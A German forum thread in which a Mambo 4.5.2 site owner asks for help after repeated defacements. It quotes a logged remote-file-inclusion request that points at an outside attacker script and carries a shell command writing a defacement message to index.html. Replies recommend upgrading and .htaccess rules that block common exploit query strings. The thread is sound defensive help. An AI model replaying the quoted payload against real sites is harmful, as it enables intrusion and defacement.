+ Antworten
Ergebnis 1 bis 4 von 4

Thema: Immer wieder Hacker angriffe

  1. #1
    Neu an Board
    Registriert seit
    15.12.2005
    Beiträge
    2
    Bedankte sich
    0
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard Immer wieder Hacker angriffe

    Hallo zusammen,
    ich habe folgendes Problem, irgendwie schaffen es Hacker bei unserer Seite www.forum-dk6.de die index.php oder die configuratin.php zu ändern bzw. eine kompl. neue index.html raufzuladen! Ich habe jetzt folgendes in den logfiles gefunden:
    http://geocities.com/thenextst/nextcha0z?&cmd=cd%20..;%20cd%20..;%20cd%20..;%20ec ho%20RickyFloW%20@%20HackBSD%20CreW>index.html
    Wenn man nur http://geocities.com/thenextst eingibt im browser kommt man auf eine hackerseite!
    Wer kann mir helfen das dieses nicht mehr passieren kann (ich bin Mambo-Anfänger).
    Zur Info, es ist Mambo 4.5.2 inst.
    Im voraus schon mal vielen Dank!

  2. #2
    Moderator Avatar von holmi
    Registriert seit
    30.08.2004
    Ort
    Harz
    Beiträge
    6.502
    Bedankte sich
    92
    Erhielt 1.234 Danksagungen
    in 1.133 Beiträgen

    Standard

    Mambo 4.5.2 ist hoffnungslos veraltet und hat sicherheitslücken!
    Mach mindestens ein Update auf 4.5.4 plus patch
    http://mamboxchange.com/frs/?group_id=5
    Oder Joomla

    Wie hatest du die Rechte bei der configuration.php eingestellt?

    Björn
    Problem gelöst? Dann markiere den Thread mit [GELÖST]

  3. #3
    Neu an Board
    Registriert seit
    15.12.2005
    Beiträge
    2
    Bedankte sich
    0
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    die Rechte bei der configuration.php ist auf 444 eingestellt

  4. #4
    Neu an Board
    Registriert seit
    22.08.2006
    Beiträge
    1
    Bedankte sich
    0
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Lächeln bei mir auch....

    Zitat Zitat von DK6_Dirty_Harry
    die Rechte bei der configuration.php ist auf 444 eingestellt
    verzeiung fuhr mein sclechtes deutsch. ich bin Niederlander.
    Zuerst mambo upgraden nach Joomla 1.0.10. (Von mambo4.52 nach Joomla 1.0, weiter upgraden von 1.0 nach 1.0.10)
    Nicht nur den config.php beschutzen, aber nog wichtiger, den index.php auf 600 von mamboroot UND index.php von templates\deinetemplate\index.php beschutzen.
    Weiter den folgenden code im .htaccess file hineinfugen:

    ########## Begin - Rewrite rules to block out some common exploits
    #
    # Block out any script trying to set a mosConfig value through the URL
    RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
    # Block out any script trying to base64_encode crap to send via URL
    RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
    # Block out any script that includes a <script> tag in URL
    RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
    # Block out any script trying to set a PHP GLOBALS variable via URL
    RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
    # Block out any script trying to modify a _REQUEST variable via URL
    RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
    # Send all blocked request to homepage with 403 Forbidden error!
    RewriteRule ^(.*)$ index.php [F,L]
    #
    ########## End - Rewrite rules to block out some common exploits

    das sind die erste schritten. Weiter kannst du naturlich deine administrator folder mit ein kennwort beschutzen, dass muss irgendwo bei deine hosting provider beschrieben sein......
    Weiter kansst du extension blocklist installieren:
    http://www.joomla-addons.org/blocklist-component.html

    usw. usw., aber ich denke dasst du jetzt die meiste attacks uberleben kannst....

    Good luck, Joe

+ Antworten

Ähnliche Themen

  1. Hacker suchen com_facileforms
    Von pcbek im Forum Sicherheit in 3rd-Party Applikationen
    Antworten: 1
    Letzter Beitrag: 21.08.2006, 09:52
  2. Hacker Angriff
    Von Kohli im Forum Sicherheit
    Antworten: 5
    Letzter Beitrag: 07.08.2006, 12:43
  3. Hacker
    Von leandro im Forum Allgemeine Fragen zu Mambo
    Antworten: 12
    Letzter Beitrag: 06.04.2006, 17:29
  4. Hacker suchen gezielt nach ungepatchten Mambo-Systemen
    Von SniperSister im Forum Allgemeine Fragen zu Mambo
    Antworten: 1
    Letzter Beitrag: 11.03.2006, 14:53
  5. Antworten: 8
    Letzter Beitrag: 12.08.2005, 18:23

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein